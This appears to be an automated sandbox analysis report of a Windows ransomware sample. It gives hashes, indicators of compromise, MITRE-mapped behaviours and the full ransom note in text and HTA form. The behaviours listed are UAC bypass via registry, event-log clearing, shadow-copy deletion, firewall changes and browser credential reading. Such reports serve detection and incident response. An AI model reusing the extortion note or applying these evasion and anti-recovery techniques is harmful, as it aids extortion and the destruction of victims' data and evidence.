e566ee2189f830504af1cb787279111b7b2f3817a61a85bad8d9810701dd4877

Analysis

max time kernel
1558s
max time network
1559s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
16-07-2024 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
Size

1.2MB
MD5

43cdea90bfe02953539194cc2612df96
SHA1

47028bc1510dca41b888db92f6f14d3a3c342f7a
SHA256

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555
SHA512

2b68f4a9f6150dfe524507213e2bf974de8a1eaaa6bbde65ffce8384432732266af24abe4bd2f877e27061b6bd381a792673a55a0073737103b7d694511a9ef0
SSDEEP

24576:C2ALmtTEQcN3ALfxdkST1750WKRuTx/0OjuSIMxMgWIMz/IPBZMIGaVp:YLSyN3ALQK14RuTxruCMIMz/sBZMIGar

Score

10^/10

defense_evasion evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\$Recycle.Bin\Restore_Your_Files.txt

Ransom Note

All Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . If Payment Isn't Made After A While We Will Sell OR Publish Some Of Your Data . You Don't Have Much Time! Your ID : CMLLV If You Want To Restore Them Email Us : [email protected] If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Telegram , ID : @Help_File To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoin

Emails

[email protected]

Extracted

Path

C:\Users\Admin\Desktop\ReadMe.hta

Ransom Note

<html><head><title>[email protected]</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{background-color: #eaecee ;border: 1px solid black;padding:30px;}.center {text-align: center;}.vl {border: 1px solid black;background-color:#f2f4f4;margin-left:5px;margin-right:5px;padding:4px;}.Mrgnlf {margin:15px;}.fnt {background-color:red;height:70px;text-align: center;font-size: 3em;} hr.new1 {border: 0;height: 1px;background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));} h3 {font-size: 12vw;}</style><HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu='no'><script language='javascript'>window.moveTo(100, 100);window.resizeTo((window.screen.width)-150,(window.screen.height)-150);</script></head><body><div class="center"><img src="data:image/png;base64,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" alt="Paris"></div></br><div class="fnt">Your Files Has Been <span class="xsw">Stolen</span> And <span class="xsw">Encrypted!</span></div></hr></br></br></br><div class="vl"><div class="Mrgnlf">All Your Files Are Locked And Important Data Downloaded !</br></br>Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You .</br></br>If Payment Isn't Made After A While We Will Sell OR Publish Some Of Your Data, You Don't Have Much Time!</br></br>Your ID : <span class="spnn">CMLLV</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">[email protected]</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Telegram , ID : <span class="spnn">@Help_File</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email.</br></br>We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail.</br></br></br></br><div class="dives" ><h3>What Is The Guarantee !</h3></br><div class="Circe1">Before Payment You Can Send Some Files For Decryption Test.</div></br></br><div class="Circe1">If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits.</div></br></br><hr class="new1"></br></br><h3>Attention !</h3></br><div class="Circe1">Do Not Rename,Modify Encrypted Files .</div></br></br><div class="Circe1">Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because </br></br>It May Make Decryption Harder Or Destroy Your Files Forever !</div></br></br><hr class="new1"></br></br><h3>Buy Bitcoin !</h3></br><div class="Circe1"><a href='https://www.kraken.com/learn/buy-bitcoin-btc'>https://www.kraken.com/learn/buy-bitcoin-btc</a></div></br></br><div class="Circe1"><a href='https://www.coinbase.com/how-to-buy/bitcoin'>https://www.coinbase.com/how-to-buy/bitcoin</a></div></div></div></div></body></html>

Emails

<html><head><title>[email protected]</title><style>.spnn

class="spnn">[email protected]</span></br></br>If

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
3368	wevtutil.exe
9988	wevtutil.exe
5336
6904	wevtutil.exe
4068	wevtutil.exe
2136	wevtutil.exe
6012	wevtutil.exe
6372	wevtutil.exe
11868	wevtutil.exe
13436	wevtutil.exe
13280	wevtutil.exe
14388	wevtutil.exe
16600	wevtutil.exe
3860	wevtutil.exe
13640	wevtutil.exe
14264	wevtutil.exe
14556	wevtutil.exe
5840	wevtutil.exe
11684	wevtutil.exe
6992	wevtutil.exe
5808	wevtutil.exe
17080	wevtutil.exe
16924	wevtutil.exe
3628	wevtutil.exe
5012	wevtutil.exe
3908	wevtutil.exe
11416	wevtutil.exe
12272	wevtutil.exe
8056	wevtutil.exe
5004	wevtutil.exe
5952	wevtutil.exe
11496	wevtutil.exe
12828	wevtutil.exe
13896	wevtutil.exe
15132
16068	wevtutil.exe
5868	wevtutil.exe
11596	wevtutil.exe
13860	wevtutil.exe
14800
11404	wevtutil.exe
14836
3084	wevtutil.exe
3740	wevtutil.exe
14212	wevtutil.exe
16320	wevtutil.exe
4172	wevtutil.exe
11328	wevtutil.exe
12720	wevtutil.exe
5172
11784	wevtutil.exe
15836	wevtutil.exe
4984	wevtutil.exe
5076	wevtutil.exe
5460	wevtutil.exe
6292	wevtutil.exe
4276	wevtutil.exe
10344	wevtutil.exe
16452	wevtutil.exe
5272	wevtutil.exe
6388	wevtutil.exe
12660
4404	wevtutil.exe
5132	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Modifies Windows Firewall 2 TTPs 6 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

1180 netsh.exe
2080 netsh.exe
404 netsh.exe
8596 netsh.exe
8660 netsh.exe
8532 netsh.exe
Deletes itself 1 IoCs

Processes:

Xinfecter.exe

pid process

3160 Xinfecter.exe

pid	process
1180	netsh.exe
2080	netsh.exe
404	netsh.exe
8596	netsh.exe
8660	netsh.exe
8532	netsh.exe

pid	process
3160	Xinfecter.exe

Drops startup file 7 IoCs

Processes:

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exeXinfecter.exe

description	ioc	process
File created	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ReadMe.hta	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	Xinfecter.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ReadMe.hta	Xinfecter.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

Executes dropped EXE 2 IoCs

Processes:

Xinfecter.exeXinfecter.exe

pid process

3160 Xinfecter.exe
7372 Xinfecter.exe
Loads dropped DLL 5 IoCs

Processes:

cmd.exe

pid process

2052 cmd.exe
2052 cmd.exe
2052 cmd.exe
2052 cmd.exe
2052 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3160	Xinfecter.exe
7372	Xinfecter.exe

pid	process
2052	cmd.exe
2052	cmd.exe
2052	cmd.exe
2052	cmd.exe
2052	cmd.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

description	ioc	process
File opened (read-only)	\??\B:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\G:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\M:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\S:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\K:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\O:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\R:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\X:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\Q:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\U:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\V:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\H:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\I:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\L:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\N:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\P:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\W:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\Y:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\Z:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\A:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\E:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\J:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened (read-only)	\??\T:	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 api.ipify.org
Power Settings 1 TTPs 2 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

wevtutil.exewevtutil.exe

pid process

5112 wevtutil.exe
2272 wevtutil.exe

flow	ioc
3	api.ipify.org

pid	process
5112	wevtutil.exe
2272	wevtutil.exe

Drops file in Program Files directory 64 IoCs

Processes:

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exeXinfecter.exe

description	ioc	process
File opened for modification	\??\c:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UNT	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\WSS.ICO_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png	Xinfecter.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\Filters\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\service.js	Xinfecter.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html	Xinfecter.exe
File created	\??\c:\Program Files\Windows Sidebar\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files\VideoLAN\VLC\locale\sr\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NVBELL.NET.XML_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.INF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Windows NT\Accessories\it-IT\wordpad.exe.mui	Xinfecter.exe
File created	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files\Java\jdk1.7.0_80\jre\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png	Xinfecter.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png	Xinfecter.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui	Xinfecter.exe
File opened for modification	\??\c:\Program Files\7-Zip\License.txt_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proofing.en-us\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099177.WMF_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgzm.exe.mui_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\JPEGIM32.FLT_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\library.js	Xinfecter.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MX.XML_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml	Xinfecter.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File created	\??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png	Xinfecter.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Media Player\en-US\wmpnssci.dll.mui	Xinfecter.exe
